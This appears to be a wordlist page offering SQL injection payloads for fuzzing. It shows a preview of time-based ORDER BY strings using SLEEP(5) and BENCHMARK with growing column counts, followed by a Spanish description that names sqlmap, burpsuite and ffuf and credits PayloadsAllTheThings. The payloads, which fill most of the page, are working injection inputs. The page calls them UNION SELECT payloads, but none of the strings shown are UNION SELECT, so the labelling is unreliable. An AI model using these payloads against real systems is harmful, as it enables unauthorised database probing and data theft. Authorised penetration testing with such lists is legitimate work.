SQL injection UNION SELECT payloads

ORDER BY SLEEP(5) ORDER BY 1,SLEEP(5) ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')) ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14

Payloads genéricos de UNION SELECT con distinta cantidad de columnas para extraer datos mediante inyección SQL basada en union.

Esta lista está orientada al fuzzing de entradas y descubrimiento de vulnerabilidades. Contiene aproximadamente 36.5 KB y combina bien con herramientas como sqlmap, burpsuite, ffuf. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y discretas para ataques en línea, mientras que las más grandes ofrecen mayor cobertura para el trabajo sin conexión donde la velocidad es una restricción menor.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de swisskyrepo/PayloadsAllTheThings y distribuida bajo MIT. Utiliza las wordlists únicamente contra sistemas para los que tengas autorización explícita para realizar pruebas.

Vista previa